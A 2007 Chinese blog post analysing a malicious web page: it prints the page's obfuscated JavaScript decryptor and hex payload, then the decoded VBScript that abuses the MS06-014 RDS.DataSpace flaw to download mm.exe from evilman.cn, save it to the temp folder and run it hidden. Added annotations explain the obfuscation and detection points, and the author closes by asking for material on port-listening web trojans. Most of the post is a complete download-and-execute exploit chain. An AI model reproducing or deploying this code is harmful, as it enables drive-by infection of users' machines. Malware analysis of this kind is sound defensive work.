今天有兴趣,看了网页木马真面目

    今天一个网站,忽然防火墙就提示有网页木马。恼火,决定看一下到底利用了什么漏洞?
首先记下网页地址:http://evilman.cn/1.htm
    先关掉所有浏览器,然后关闭防火墙,打开记事本,CTRL+O,打开这个网页,看到如下源码:
<SCRIPT LANGUAGE="JavaScript">
<!--
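/**
 * Decode a hex-encoded, password-obfuscated string.
 *
 * Layout of `str`: a run of two-digit hex bytes followed by an 8-hex-digit
 * salt. Each byte is XORed with a keystream value taken from a linear
 * congruential generator (modulus 2^31 - 1) whose multiplier, increment and
 * seed are all derived from the decimal character codes of `pwd` plus the salt.
 *
 * Note for analysts: this is obfuscation, not encryption. On this page the
 * caller passes a four-digit literal as the password in clear text, the
 * keystream is an LCG and nothing is authenticated, so anyone holding the
 * page can decode the payload; all it defeats is string-based signature
 * matching of the embedded script.
 *
 * @param {string} str  hex-encoded ciphertext with the salt as its last 8 characters
 * @param {string} pwd  password the message was encoded with
 * @returns {string|undefined} the decoded text, or undefined (after an alert())
 *   when `str` is too short to carry a salt or `pwd` is empty
 */
function decrypt(str, pwd) {
  if(str == null || str.length < 8) {
    alert("A salt value could not be extracted from the encrypted message because it's length is too short. The message cannot be decrypted.");
    return;
  }
  if(pwd == null || pwd.length <= 0) {
    alert("Please enter a password with which to decrypt the message.");
    return;
  }
  // Seed material: the decimal character codes of the password, concatenated.
  var prand = "";
  for(var i=0; i<pwd.length; i++) {
    prand += pwd.charCodeAt(i).toString();
  }
  // LCG multiplier: five digits picked from the seed string at fixed offsets.
  var sPos = Math.floor(prand.length / 5);
  var mult = parseInt(prand.charAt(sPos) + prand.charAt(sPos*2) + prand.charAt(sPos*3) + prand.charAt(sPos*4) + prand.charAt(sPos*5), 10);
  // LCG increment and modulus (2^31 - 1).
  var incr = Math.round(pwd.length / 2);
  var modu = Math.pow(2, 31) - 1;
  // The trailing 8 hex digits are the salt; strip them from the ciphertext.
  var salt = parseInt(str.substring(str.length - 8, str.length), 16);
  str = str.substring(0, str.length - 8);
  prand += salt;
  // Fold the seed string down to at most 10 digits before using it as a number.
  while(prand.length > 10) {
    prand = (parseInt(prand.substring(0, 10), 10) + parseInt(prand.substring(10, prand.length), 10)).toString();
  }
  prand = (mult * prand + incr) % modu;
  var enc_chr = "";
  var enc_str = "";
  // One byte per hex pair: XOR with the current keystream byte, then step the LCG.
  for(var i=0; i<str.length; i+=2) {
    enc_chr = parseInt(str.substring(i, i+2), 16) ^ Math.floor((prand / modu) * 255);
    enc_str += String.fromCharCode(enc_chr);
    prand = (mult * prand + incr) % modu;
  }
  return enc_str;
}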

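// Stage-2 payload URL. The decoded VBScript reads this global and passes it
// to XMLHTTP ("x.Open str6, dl, False"), then executes whatever it fetched,
// so this is the indicator to block at the proxy and hunt for in web logs.
// Declared with `var` rather than as an implicit global so the assignment
// is also valid under strict mode.
var dl = "http://evilman.cn/mm.exe";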
// Encrypted stage-1 payload as hex pairs (written as \xHH escapes); the last
// 8 hex digits are the salt that decrypt() strips off. The password used to
// decode it is passed in clear text a few lines below, so this "encryption"
// only hides the VBScript from signature scanners, not from an analyst.
var WangLuoQianJu="\x46\x38\x44\x32\x42\x46\x35\x44\x32\x34\x41\x32\x35\x41\x42\x34\x46\x36\x33\x37\x32\x43\x42\x33\x42\x30\x43\x33\x34\x43\x32\x41\x35\x46\x37\x33\x30\x39\x32\x38\x32\x33\x46\x45\x39\x30\x42\x34\x33\x34\x33\x38\x39\x37\x30\x34\x38\x38\x39\x36\x35\x36\x45\x30\x39\x35\x33\x42\x41\x31\x34\x32\x43\x45\x45\x42\x37\x39\x38\x35\x32\x30\x44\x42\x35\x31\x31\x31\x42\x33\x31\x32\x44\x43\x37\x38\x42\x46\x32\x36\x44\x36\x45\x45\x46\x37\x44\x35\x39\x41\x45\x41\x35\x30\x35\x34\x43\x37\x32\x44\x33\x31\x36\x37\x38\x37\x33\x33\x30\x30\x35\x41\x44\x46\x30\x44\x41\x31\x35\x38\x32\x39\x43\x34\x44\x32\x32\x44\x31\x42\x33\x42\x45\x36\x45\x31\x34\x38\x36\x37\x38\x41\x34\x34\x31\x33\x37\x46\x38\x38\x42\x30\x35\x31\x46\x44\x38\x41\x37\x39\x33\x31\x43\x34\x42\x33\x44\x38\x37\x31\x38\x31\x45\x43\x35\x32\x39\x44\x34\x35\x37\x42\x30\x36\x44\x42\x31\x44\x30\x33\x41\x46\x34\x45\x34\x34\x38\x38\x30\x31\x45\x33\x35\x42\x31\x41\x30\x46\x37\x37\x37\x37\x31\x42\x42\x31\x46\x36\x33\x39\x46\x41\x33\x42\x39\x44\x32\x44\x31\x46\x38\x46\x39\x30\x34\x44\x43\x31\x32\x46\x45\x39\x38\x37\x35\x35\x37\x33\x41\x35\x35\x43\x30\x42\x30\x33\x39\x34\x43\x39\x44\x33\x31\x30\x46\x30\x37\x33\x42\x46\x38\x41\x31\x32\x35\x32\x46\x37\x44\x36\x36\x44\x33\x33\x39\x43\x34\x33\x46\x45\x43\x33\x41\x33\x34\x41\x32\x35\x30\x45\x46\x46\x38\x30\x45\x31\x31\x34\x39\x30\x41\x42\x45\x31\x33\x31\x31\x35\x39\x36\x45\x36\x30\x42\x41\x43\x34\x32\x42\x41\x32\x33\x38\x42\x36\x41\x43\x44\x33\x37\x35\x38\x42\x31\x31\x37\x38\x42\x30\x44\x36\x46\x30\x32\x35\x45\x32\x35\x36\x44\x46\x32\x45\x35\x32\x46\x33\x31\x39\x32\x42\x30\x37\x41\x33\x31\x39\x42\x33\x36\x42\x38\x31\x44\x37\x34\x32\x39\x37\x36\x35\x45\x43\x32\x34\x38\x35\x32\x39\x39\x36\x31\x37\x30\x41\x44\x31\x33\x37\x37\x39\x45\x32\x36\x41\x43\x38\x38\x41\x36\x35\x42\x45\x42\x41\x34\x44\x31\x43\x38\x35\x30\x32\x33\x34\x36\x33\x45\x33\x41\x30\x38\x46\x41\x37\x31\x30\x34\x44\x43\x36\x39\x34\x44\x30\x41\x36\x35\x36\x33\x36\x32\x45\x41\x41\x43\x41\x34\x41\x31\x41\x41\x37\x33\x45\
x43\x34\x43\x42\x43\x34\x32\x38\x36\x43\x31\x36\x41\x31\x45\x35\x32\x33\x37\x39\x37\x46\x41\x31\x35\x41\x34\x43\x34\x46\x33\x37\x42\x39\x33\x43\x37\x39\x30\x39\x46\x41\x37\x30\x38\x44\x30\x35\x39\x45\x32\x35\x33\x32\x44\x44\x34\x44\x30\x38\x34\x44\x43\x37\x45\x31\x30\x45\x46\x32\x31\x31\x45\x31\x43\x41\x39\x45\x43\x46\x36\x39\x32\x43\x41\x36\x32\x32\x34\x35\x45\x34\x45\x36\x43\x41\x39\x31\x43\x42\x33\x43\x44\x42\x34\x37\x33\x42\x33\x46\x33\x36\x36\x36\x42\x45\x38\x35\x36\x32\x32\x36\x46\x45\x30\x35\x41\x45\x41\x46\x45\x43\x30\x33\x45\x37\x41\x30\x34\x46\x35\x36\x43\x36\x42\x44\x36\x41\x38\x35\x30\x44\x46\x33\x34\x41\x36\x35\x38\x32\x34\x33\x36\x30\x46\x39\x32\x35\x30\x32\x41\x44\x34\x31\x34\x32\x38\x31\x45\x30\x33\x44\x45\x33\x33\x44\x43\x35\x43\x43\x36\x42\x35\x46\x33\x32\x46\x37\x30\x34\x35\x35\x37\x44\x42\x46\x32\x32\x37\x35\x42\x30\x42\x34\x43\x37\x43\x35\x39\x37\x46\x36\x41\x45\x42\x38\x42\x45\x42\x30\x46\x42\x34\x33\x37\x38\x38\x32\x32\x34\x45\x39\x32\x46\x43\x46\x35\x43\x37\x42\x35\x42\x30\x43\x39\x33\x42\x30\x36\x38\x32\x41\x32\x39\x36\x31\x30\x39\x34\x33\x44\x35\x32\x30\x46\x38\x32\x30\x30\x45\x46\x41\x38\x38\x44\x43\x37\x39\x42\x36\x41\x33\x31\x44\x35\x36\x30\x31\x30\x41\x39\x42\x46\x41\x37\x45\x36\x38\x37\x33\x30\x34\x37\x39\x45\x41\x44\x45\x31\x34\x46\x36\x32\x36\x41\x41\x34\x34\x34\x45\x46\x36\x36\x44\x39\x39\x35\x39\x31\x31\x41\x31\x38\x32\x44\x38\x31\x45\x30\x39\x36\x31\x34\x44\x44\x30\x39\x44\x45\x31\x30\x43\x35\x45\x30\x36\x38\x43\x30\x34\x32\x31\x33\x46\x35\x45\x45\x44\x44\x36\x39\x32\x36\x34\x37\x44\x41\x35\x37\x45\x41\x37\x42\x37\x41\x43\x45\x36\x38\x31\x42\x43\x41\x41\x34\x45\x37\x46\x45\x45\x44\x33\x41\x34\x35\x38\x46\x32\x38\x43\x31\x31\x34\x45\x39\x39\x39\x34\x34\x34\x43\x32\x33\x39\x33\x41\x38\x33\x45\x32\x34\x39\x41\x37\x33\x33\x39\x32\x34\x39\x39\x46\x37\x31\x35\x46\x38\x43\x30\x33\x39\x45\x33\x41\x33\x32\x39\x31\x41\x45\x31\x36\x41\x31\x34\x46\x32\x32\x30\x42\x34\x44\x34\x31\x38\x30\x38\x43\x38\x35\x32\x41\x34\x41\x35\x44\x42\x44\x45\x45\
x32\x43\x44\x41\x41\x30\x39\x44\x30\x37\x44\x32\x44\x30\x46\x46\x44\x34\x39\x36\x41\x35\x33\x36\x37\x39\x37\x35\x46\x34\x30\x31\x42\x39\x33\x33\x32\x30\x37\x34\x37\x39\x35\x43\x41\x43\x41\x44\x34\x38\x46\x38\x35\x41\x31\x33\x37\x33\x42\x41\x38\x33\x44\x38\x34\x30\x39\x46\x39\x44\x41\x44\x41\x42\x38\x37\x37\x43\x44\x37\x44\x33\x42\x34\x35\x42\x36\x32\x41\x30\x30\x45\x32\x42\x37\x34\x42\x39\x42\x33\x39\x43\x32\x39\x38\x39\x38\x43\x38\x42\x39\x34\x38\x31\x33\x43\x42\x45\x43\x43\x41\x43\x37\x36\x38\x42\x44\x31\x43\x39\x41\x45\x31\x33\x42\x43\x45\x36\x44\x39\x44\x35\x32\x34\x39\x36\x45\x33\x42\x37\x38\x46\x35\x44\x35\x41\x30\x45\x32\x30\x43\x45\x33\x31\x46\x36\x44\x33\x46\x33\x41\x43\x46\x35\x30\x33\x30\x37\x43\x34\x44\x44\x44\x42\x30\x38\x34\x39\x32\x38\x37\x39\x31\x39\x42\x33\x35\x41\x32\x46\x43\x36\x46\x38\x41\x33\x45\x33\x37\x46\x34\x36\x45\x30\x44\x31\x41\x39\x31\x44\x44\x32\x35\x44\x43\x34\x45\x36\x37\x46\x46\x38\x42\x30\x34\x41\x35\x38\x45\x30\x35\x46\x45\x45\x30\x41\x46\x39\x32\x30\x30\x41\x30\x45\x38\x35\x35\x41\x45\x38\x46\x33\x30\x37\x39\x46\x43\x31\x30\x44\x32\x34\x46\x43\x45\x32\x38\x36\x37\x34\x45\x44\x43\x32\x42\x46\x41\x42\x34\x35\x46\x31\x41\x32\x45\x31\x38\x35\x30\x44\x32\x38\x44\x46\x30\x36\x44\x36\x36\x42\x42\x36\x43\x43\x33\x39\x46\x35\x36\x37\x41\x35\x41\x46\x43\x42\x46\x31\x34\x42\x37\x39\x30\x34\x34\x34\x34\x35\x43\x42\x30\x34\x36\x38\x43\x45\x42\x34\x35\x38\x44\x42\x41\x42\x39\x36\x34\x39\x33\x38\x35\x38\x33\x38\x31\x43\x44\x38\x35\x31\x37\x39\x35\x39\x42\x34\x43\x42\x30\x35\x46\x33\x37\x33\x41\x33\x42\x30\x33\x44\x42\x36\x36\x46\x41"
// Decode and hand the result straight to the HTML parser. The decoded text
// is the <script language="VBScript"> block shown later in the post, so this
// document.write() call is the step that actually executes the exploit chain.
// Writing the same string into a textarea's .value (as the post does next)
// shows it without running it.
document.write(decrypt(WangLuoQianJu,
"3800"))
//-->
</SCRIPT>

      有一段加密的函数,不过已经给出了解密算法和密码,我们修改下,然后看一下这段加密的东西到底是什么脚本:
     修改最后的：

// This is the line to replace: document.write() hands the decoded text to the
// HTML parser, so the VBScript inside it runs as soon as the page loads.
document.write(decrypt(WangLuoQianJu,"3800"))
//-->
</SCRIPT>

更改为:


//-->
</SCRIPT>
<textarea id="tbSrc" style="width:100%;height:300px">
</textarea>

<script type="text/javascript">
// Assigning the decoded text to the textarea's .value treats it as data, so
// the VBScript is displayed rather than parsed and executed. decrypt() itself
// still runs in the browser, so do this in an isolated analysis VM.
document.getElementById(
"tbSrc").value = decrypt(WangLuoQianJu,"3800");

</script>
    然后运行一下:我们在文本框中看到真实的病毒脚本:
<script language="VBScript">
' "On Error Resume Next" hides every failure: if one of the COM objects below
' cannot be created (e.g. the control is patched or kill-bitted), the page
' silently does nothing instead of showing a script error.
on error resume next
' This CLSID is the RDS.DataSpace control in msadco.dll, the MS06-014 issue
' the post identifies. Its CreateObject method is what lets this page
' instantiate the COM objects below that page script alone would not be
' allowed to create.
Set df = document.createElement("object")
df.setAttribute 
"classid""clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
' ProgIDs are assembled from fragments ("Ado"&"db."&"Str"&"eam") so the
' literal string "ADODB.Stream" never appears in the page, defeating naive
' signature matching. They resolve to Microsoft.XMLHTTP and ADODB.Stream.
str
="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1
="Ado"
a2
="db."
a3
="Str"
a4
="eam"
str1
=a1&a2&a3&a4
str5
=str1
set S = df.createobject(str5,"")
' type = 1 (adTypeBinary): the stream will hold raw executable bytes.
S.type 
= 1
' Stage 2: synchronous GET of the global dl set by the JavaScript wrapper
' (the mm.exe URL), i.e. a plain drive-by download.
str6
="GET"
x.Open str6, dl, 
False
x.Send
' The body is saved into the temp folder (GetSpecialFolder(2)) under a .com
' name, so that ShellExecute "open" runs it as an executable. savetofile's
' second argument 2 (adSaveCreateOverWrite) replaces any existing file.
fname1
="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2
fname1
= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,
2
S.close
' Execution via Shell.Application with window style 0 (hidden).
' Detection points: a browser process instantiating RDS.DataSpace together
' with ADODB.Stream / FileSystemObject / Shell.Application, a new file
' appearing in %TEMP%, and a child process started from that file.
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,
"","","open",0
</script>
      看到了clsid:BD96C556-65A3-11D0-983A-00C04FC29E36吧,原来是MS06-014: msadco.dll 严重漏洞
后面还利用了XMLHTTP来下载木马,用FileSystemObject来保存文件,用Shell.Application来运行木马。

    真相大白,我一直想知道那个利用网页,直接开端口监听的网页木马是如何做的,谁给告诉我点资料呀?
posted @ 2007-07-08 19:47  阿牛  阅读(1056)  评论(1)  编辑  收藏  举报